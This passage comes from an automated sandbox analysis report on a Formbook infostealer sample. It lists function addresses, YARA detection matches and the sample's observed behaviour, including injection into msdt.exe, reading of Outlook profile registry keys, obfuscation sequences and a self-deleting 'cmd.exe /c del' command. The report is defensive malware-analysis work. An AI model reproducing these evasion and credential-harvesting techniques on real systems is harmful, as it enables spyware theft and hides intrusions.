          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609A80 NtOpenDirectoryObject,6_2_04609A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0460A3B0 NtGetContextThread,6_2_0460A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C87A60 NtClose,6_2_02C87A60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C87B10 NtAllocateVirtualMemory,6_2_02C87B10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C879E0 NtReadFile,6_2_02C879E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C87930 NtCreateFile,6_2_02C87930
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C87B0A NtAllocateVirtualMemory,6_2_02C87B0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C879DA NtReadFile,6_2_02C879DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C87987 NtReadFile,6_2_02C87987
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 0_2_00CB2B780_2_00CB2B78
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 0_2_00CB04C80_2_00CB04C8
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 0_2_00CBF6300_2_00CBF630
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 0_2_00CB04B80_2_00CB04B8
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 0_2_00CBF61F0_2_00CBF61F
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00408A401_2_00408A40
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041C2A71_2_0041C2A7
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABE31_2_0041ABE3
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABE61_2_0041ABE6
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041B4641_2_0041B464
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041BCC51_2_0041BCC5
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402D891_2_00402D89
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041B6191_2_0041B619
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0468D4666_2_0468D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045EB4776_2_045EB477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045D841F6_2_045D841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046844966_2_04684496
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04691D556_2_04691D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04692D076_2_04692D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045C0D206_2_045C0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046925DD6_2_046925DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045DD5E06_2_045DD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045F25816_2_045F2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04682D826_2_04682D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045E6E306_2_045E6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0468D6166_2_0468D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04692EF76_2_04692EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04691FF16_2_04691FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0469DFCE6_2_0469DFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0469E8246_2_0469E824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046810026_2_04681002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045EA8306_2_045EA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046928EC6_2_046928EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046920A86_2_046920A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045DB0906_2_045DB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045F20A06_2_045F20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045CF9006_2_045CF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045E41206_2_045E4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045E99BF6_2_045E99BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0467FA2B6_2_0467FA2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04684AEF6_2_04684AEF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046922AE6_2_046922AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045EAB406_2_045EAB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0466CB4F6_2_0466CB4F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04692B286_2_04692B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045EA3096_2_045EA309
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046723E36_2_046723E3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045FABD86_2_045FABD8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046803DA6_2_046803DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0468DBD26_2_0468DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045F138B6_2_045F138B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_045FEBB06_2_045FEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8C2A76_2_02C8C2A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C78A406_2_02C78A40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8ABE36_2_02C8ABE3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8ABE66_2_02C8ABE6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8B6196_2_02C8B619
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C72FB06_2_02C72FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8BCC56_2_02C8BCC5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8B4646_2_02C8B464
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C72D896_2_02C72D89
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C72D906_2_02C72D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 045CB150 appears 136 times
          Source: Scn14.092020.exeStatic PE information: invalid certificate
          Source: Scn14.092020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000000.00000002.378140538.0000000000A6A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Scn14.092020.exe
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000001.00000002.418209930.000000000185F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000001.00000002.419109090.00000000034D0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs Scn14.092020.exe
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Scn14.092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@14/10
          Source: C:\Users\user\Desktop\Scn14.092020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scn14.092020.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_01
          Source: Scn14.092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Scn14.092020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Scn14.092020.exeVirustotal: Detection: 20%
          Source: unknownProcess created: C:\Users\user\Desktop\Scn14.092020.exe 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Scn14.092020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Scn14.092020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.396341112.0000000007640000.00000002.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000002.00000000.401572746.000000000E1B0000.00000004.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: Scn14.092020.exe, 00000001.00000002.419109090.00000000034D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Scn14.092020.exe, 00000001.00000002.417638006.0000000001740000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.641809913.00000000045A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Scn14.092020.exe, 00000001.00000002.417638006.0000000001740000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000002.00000000.401572746.000000000E1B0000.00000004.00000001.sdmp
          Source: Binary string: msdt.pdb source: Scn14.092020.exe, 00000001.00000002.419109090.00000000034D0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.396341112.0000000007640000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xD599EBD7 [Sat Jul 24 05:59:51 2083 UTC]
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004148E6 push es; retf 1_2_004148ED
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00414977 push esi; ret 1_2_00414978
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417C73 push cs; retf 1_2_00417C7E
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0461D0D1 push ecx; ret 6_2_0461D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8AAF5 push eax; ret 6_2_02C8AB48
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8ABAC push eax; ret 6_2_02C8ABB2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8AB4B push eax; ret 6_2_02C8ABB2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C8AB42 push eax; ret 6_2_02C8AB48
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C848E6 push es; retf 6_2_02C848ED
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C849C5 pushfd ; iretd 6_2_02C849C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C84977 push esi; ret 6_2_02C84978
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C84E46 push 76AC60C6h; retf